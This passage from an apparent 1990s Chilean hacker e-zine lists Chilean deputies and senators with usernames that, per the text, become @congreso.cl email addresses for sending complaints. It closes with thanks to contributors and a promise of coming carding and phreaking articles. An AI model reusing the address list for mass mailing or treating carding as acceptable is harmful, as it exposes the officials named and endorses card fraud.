Alberto.Espina:aespina
Jaime.Estevez:jestevez
Angel.Fantuzzi:afantuz
# -- Luis.Valentin.Ferrada:lferrada
Renan.Fuentealba:rfuentea
Ruben.Gajardo:rgajardo
# -- Jose.Antonio.Galilea:jgalilea
# -- Rene.Manuel.Garcia:rmgarcia
Jose.Garcia:jgarcia
Alejandro.Garcia:agarcia
Guido.Girardi:ggirardi
# -- Jose.Luis.Gonzalez:jlgonzal
Homero.Gutierrez:hgutierr
Mario.Hamuy:mhamuy
Miguel.Hernandez:mhernand
Francisco.Huenchumilla:fhuenchu
@ -- Jose.Maria.Hurtado:jmhurtad
Octavio.Jara:ojara
Tomas.Jocelyn-Holt:tjholt
Harry.Jurgensen:hjurgens
Vicente.Karelovic:karelovi
# -- Carlos.Ignacio.Kuschel:kuschel
# -- Juan.Carlos.Latorre:jlatorre
Cristian.Leay:cleay
Roberto.Leon:rleon
# -- Juan.Pablo.Letelier:jpleteli
Arturo.Longton:alongton
Pablo.Longueira:plonguei
Zarko.Luksin:luksic
Jose.Makluf:jmakluf
Rosauro.Martinez:rmartine
Gutemberg.Martinez:gmartine
Juan.Masferrer:masferre
Evelyn.Matthei:ematthei
Patricio.Melero:pmelero
Carlos.Montes:cmontes
Sergio.Morales:smorales
Ivan.Moreira:imoreira
Victor.Jeame:barrueto
Felipe.Letelier:fletelie
Eugenio.Munizaga:munizaga
Pedro.Munoz:pmunoz
Jaime.Naranjo:jnaranjo
Alejabdro.Navarro:anavarro
Sergio.Ojeda:sojeda
Jaime.Ortiz:jorpis
Jose.Miguel:jmortiz
Andres.Palma:apalma
Joaquin.Palma:jpalma
Dario.Paya:dpaya
Anibal.Perez:anibalpe
Ramon.Perez:ramonpe
Victor.Perez:victorpe
Jorge.Pizarro:jpizarro
Fanny.Pollaro:fpollaro
Marina.Prochelle:mprochel
Baldo.Prokurica:prokuric
Romy.Rebolledo:romyre
Victor.Reyes:vreyes
Teodoro.Ribera:tribera
Jaime.Rocha:jrocha
Claudio.Rodriguez:crodri
Maria.Antonieta.Saa:masaa
Hosain.Sabag:hsabag
Edmundo.Salas:esalas
Jorge.Schaulson:schaulso
Rodolfo.Seguel:rseguel
Exequiel.Silva:esilva
Valentin.Solis:vsolis
Jorge.Soria:jsoria
Vicente.Sota:vsota
# -- Juan.Enrique.Taladriz:taladriz
Isidoro.Toha:itoha
Eugenio.Tuma:etuma
Jorge.Ulloa:julloa
Raul.Urrutia:rurrutia
Salvador.Urrutia:surrutia
Carlos.Valcarce:valcarce
Felipe.Valenzuela:felipeva
Alfonso.Vargas:avargas
Osvaldo.Vega:ovega
Samuel.Venegas:svenegas
Jose.Antonio:vierag
Carlos.Vilches:cvilches
Erick.Villegas:evillega
Edmundo.Villouta:villouta
Ignacio.Walker:iwalker
Martita.Worner:mworner
Hector.Zambrano:zambrano

# Senadores

Arturo.Alessandri:aalessan
Sergio.Bitar:sbitar
Rolando.Calderon:calderon
Eugenio.Cantuaria:ecantuar
#Maria.Elena.Carrera:mcarrera
Alberto.Cooper:acooper
Nicolas.Diaz:ndiaz
Sergio.Diez:sdiez
#Francisco.Javier.Errazuriz:ferrazu
Olga.Feliu:ofeliu
Sergio.Fernandez:sfernand
Arturo.Frei:afrei
Carmen.Frei:cfrei
Jaime.Gazmuri:jgazmuri
Juan.Hamilton:hamilton
Ricardo.Hormazabal:rhormaza
Antonio.Horvath:ahorvath
Vicente.Huerta:vhuerta
Julio.Lagos:jlagos
Hernan.Larrain:hlarrain
Enrique.Larre:elarre
Jorge.Lavandero:jlavand
Carlos.Letelier:cletelie
Ricardo.Martin:rmartin
Manuel.Antonio.Matta:mmatta
Ronald.Mcintyre:rmacinty
Roberto.Munoz:rmunoz
Ricardo.Nunez:rnunez
Carlos.Ominami:ominami
Miguel.Otero:mol
Sergio.Paez:spaez
Ignacio.Perez:iperez
Sebastian.Pinera:spinera
Francisco.Prat:fprat
Mario.Rios:mrios
Sergio.Romero:sromero
Jose.Ruiz:jruiz
Mariano.Ruiz:mruiz
Bruno.Siebert:bsiebert
Santiago.Sinclair:sinclair
Anselmo.Sule:asule
William.Thayer:thayer
Beltran.Urenda:urenda
Gabriel.Valdes:gvaldes
Adolfo.Zaldivar:azaldiva
Andres.Zaldivar:zaldivar

Ahora al nombre de user agregale el @congreso.cl y ya tienes su direccion de
correo para que envies tus reclamos a estos honorables señores , que se
dedican a despilfarrar nuestro dinero y a legislar para ellos :> .-

((((((((((((((((((((((((((((((((((((fin)))))))))))))))))))))))))))))))))))))))



                         ~~~~~~~~~~~~~~~~~~~~~~~~~~
                         #                        #
                         #  11.- ShutDown         #
                         #                        # 
                         ~~~~~~~~~~~~~~~~~~~~~~~~~~

Bueno a llegado la hora de decir adios , como veen no nos hemos quedado en el
primer numero .
Hemos empezado bien , nos gusta lo que hacemos y lo seguiremos haciendo .
Realmente sentimos que mucha gente no nos ha tomado en serio o talvez no nos
quieren tomar en cuenta , pero realmente no nos importa , por que seguiremos
trabajando para todo aquel que quiera aprender , empezaremos acrecer con la
ayuda de nuestros lectores , sabemos que hay mucha gente que ya nos conoce ,
y nos conocen ya en nuestro pais ... 
Pronto nuestro amigo PINGURO nos entregara una introduccion al LINUX , cosa
que creo bastante interesante ...Ademas de un espectacular articulo de carding
, nuestro amigo _AnDyK_ nos sorprendera con algun articulo de phreaking ...
talvez unos truqitos , bueno quien sabe , se nos quedan varias cosas en el
tintero , talvez hasta regalemos versiones de LINUX en CD ... bueno todos son
proyectos que pretendemos cumplir con la ayuda de todos ...... Esperemos que
nuestro amigo TAkER decida seguir trabajando con nosotros ...!!!!! PGP que es
eso .. por supuesto pronto publicaremos nustras llaves PGP ... pero les
rogaremos que no nos escriban nada delicado en nuestros correos AUN ..
Recuerden el GRAN HERMANO NOS OBSERVA !!!!
Tambien estamos dispuestos a recibir sus opiniones , datos noticias o lo que
sea , al final para eso estamos o nop !!!!...

SE NOS QUEDAN MUCHAS COSAS EN EL TINTERO PERO SALDRAN A LA LUZ EN EL PROXIMO
NUMERO DE PROYECTO_R .

AGRADECIMIENTOS ESPECIALES A :


FELIPE ANDRES RIQUELME  .- gracias por tu apoyo flaco !!!!!
TAkER
_AnDyK_
PINGURO
GuyBrush
Yo_Soy VaF`98
PATA
Lobito-Lobosaurio
Y a todos los de la lista de correo de RAREGAZZ .-

GRACIAS a TODoS Y hAStA la pROxImA si LA reD lO pErmITe .-





SOMOS LA CULTURA DE LA BASURA , TENEMOS TODA EL ALMA DURA !!!!!!

